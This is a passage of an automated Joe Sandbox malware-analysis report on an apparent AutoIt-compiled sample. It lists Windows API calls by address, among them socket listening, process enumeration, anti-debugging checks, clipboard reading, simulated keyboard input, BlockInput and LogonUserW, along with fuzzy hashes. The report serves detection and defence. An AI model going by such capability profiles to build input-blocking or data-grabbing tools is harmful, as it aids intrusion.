• WSAGetLastError.WSOCK32(00000000), ref: 00465363
• closesocket.WSOCK32(00000000,00000000), ref: 00465377
• listen.WSOCK32(00000000,00000005), ref: 00465381
• WSAGetLastError.WSOCK32(00000000), ref: 004653A9
• closesocket.WSOCK32(00000000,00000000), ref: 004653BD
Similarity
• API ID: ErrorLast$closesocket$bindlistensocket
• String ID:
• API String ID: 540024437-0
Similarity
• API ID:
• String ID: ERCP$VUUU$VUUU$VUUU$XjH
• API String ID: 0-2872873767
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
• __wsplitpath.LIBCMT ref: 00475644
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• _wcscat.LIBCMT ref: 00475657
• __wcsicoll.LIBCMT ref: 0047567B
• Process32NextW.KERNEL32(00000000,?), ref: 004756AB
• CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                                        Similarity
                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                        • String ID:
                                                                                                        • API String ID: 2547909840-0
                                                                                                        • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                        • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                                        • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                        • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• FindFirstFileW.KERNEL32(?,?), ref: 004524DF
• Sleep.KERNEL32(0000000A), ref: 0045250B
• FindNextFileW.KERNEL32(?,?), ref: 004525E9
• FindClose.KERNEL32(?), ref: 004525FF
Strings
Similarity
• API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
• String ID: *.*$\VH
• API String ID: 2786137511-2657498754
• Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
• Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
• Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
• Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
APIs
• IsDebuggerPresent.KERNEL32 ref: 00421FC1
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
• UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
• GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
• TerminateProcess.KERNEL32(00000000), ref: 00422004
Strings
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID: pqI
• API String ID: 2579439406-2459173057
• Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
• Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
• Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
• Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
APIs
• __wcsicoll.LIBCMT ref: 00433349
• mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
• __wcsicoll.LIBCMT ref: 00433375
• mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
Strings
Similarity
• API ID: __wcsicollmouse_event
• String ID: DOWN
• API String ID: 1033544147-711622031
• Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
• Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
• Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
• Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
APIs
• GetKeyboardState.USER32(?), ref: 0044C3D2
• SetKeyboardState.USER32(00000080), ref: 0044C3F6
• PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
• PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
• SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
Similarity
• API ID: KeyboardMessagePostState$InputSend
• String ID:
• API String ID: 3031425849-0
• Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
• Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
• Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
• Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
APIs
  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
• socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
• WSAGetLastError.WSOCK32(00000000), ref: 00476692
Similarity
• API ID: ErrorLastinet_addrsocket
• String ID:
• API String ID: 4170576061-0
• Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
• Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
• Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
• Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
APIs
  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
• IsWindowVisible.USER32 ref: 0047A368
• IsWindowEnabled.USER32 ref: 0047A378
• GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
• IsIconic.USER32 ref: 0047A393
• IsZoomed.USER32 ref: 0047A3A1
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
• Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
• Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
• Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
APIs
  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
• CoInitialize.OLE32(00000000), ref: 00478442
• CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
• CoUninitialize.OLE32 ref: 0047863C
Strings
                                                                                                        Similarity
                                                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                        • String ID: .lnk
                                                                                                        • API String ID: 886957087-24824748
                                                                                                        • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                        • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                                                        • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                        • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
APIs
• OpenClipboard.USER32(?), ref: 0046DCE7
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
• GlobalLock.KERNEL32(00000000), ref: 0046DD37
• CloseClipboard.USER32 ref: 0046DD41
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
• GetClipboardData.USER32(00000001), ref: 0046DD8D
• CloseClipboard.USER32 ref: 0046DD99
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
• String ID:
• API String ID: 15083398-0
• Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
• Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
• Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
• Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: _memmove
• String ID: U$\
• API String ID: 4104443479-100911408
• Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
• Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
• Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
• Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
APIs
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
• FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
• Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
• Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
• Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
APIs
• GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
• FindFirstFileW.KERNEL32(?,?), ref: 004339D8
• FindClose.KERNEL32(00000000), ref: 004339EB
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
• Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
• Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
• Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
• Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
• InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: Internet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 901099227-0
• Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
• Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
• Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
• Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
APIs
• DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: Proc
• String ID:
• API String ID: 2346855178-0
• Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
• Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
• Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
• Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
APIs
• BlockInput.USER32(00000001), ref: 0045A38B
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
• Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
• Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
• Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
• Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                                                        APIs
                                                                                                        • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: LogonUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 1244722697-0
                                                                                                        APIs
                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                                                        Similarity
                                                                                                        • API ID: NameUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 2645101109-0
                                                                                                        APIs
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID:
                                                                                                        • API String ID: 3192549508-0
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: N@
                                                                                                        • API String ID: 0-1509896676
                                                                                                        APIs
                                                                                                        • DeleteObject.GDI32(?), ref: 0045953B
                                                                                                        • DeleteObject.GDI32(?), ref: 00459551
                                                                                                        • DestroyWindow.USER32(?), ref: 00459563
                                                                                                        • GetDesktopWindow.USER32 ref: 00459581
                                                                                                        • GetWindowRect.USER32(00000000), ref: 00459588
                                                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                                                        • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                                                        • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                                                        • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                                                        • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                                                        • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                                                        • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                                                        • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                                                        • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                                                        • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                                                        • _wcslen.LIBCMT ref: 00459916
                                                                                                        • _wcscpy.LIBCMT ref: 0045993A
                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                                                        • GetDC.USER32(00000000), ref: 004599FC
                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                                                        • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                                                        • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                                        • API String ID: 4040870279-2373415609
                                                                                                        • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                        • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                                        • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                        • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                                                        APIs
                                                                                                        • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                                        • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                                        • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                                        • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                                        • SelectObject.GDI32(?,?), ref: 00441874
                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                                        • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                                        • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                                        • DeleteObject.GDI32(?), ref: 004418D5
                                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                                        • FillRect.USER32(?,?,?), ref: 00441970
                                                                                                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                          • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                          • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                          • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                                          • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                          • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                          • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                          • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                          • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                          • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                          • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                          • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
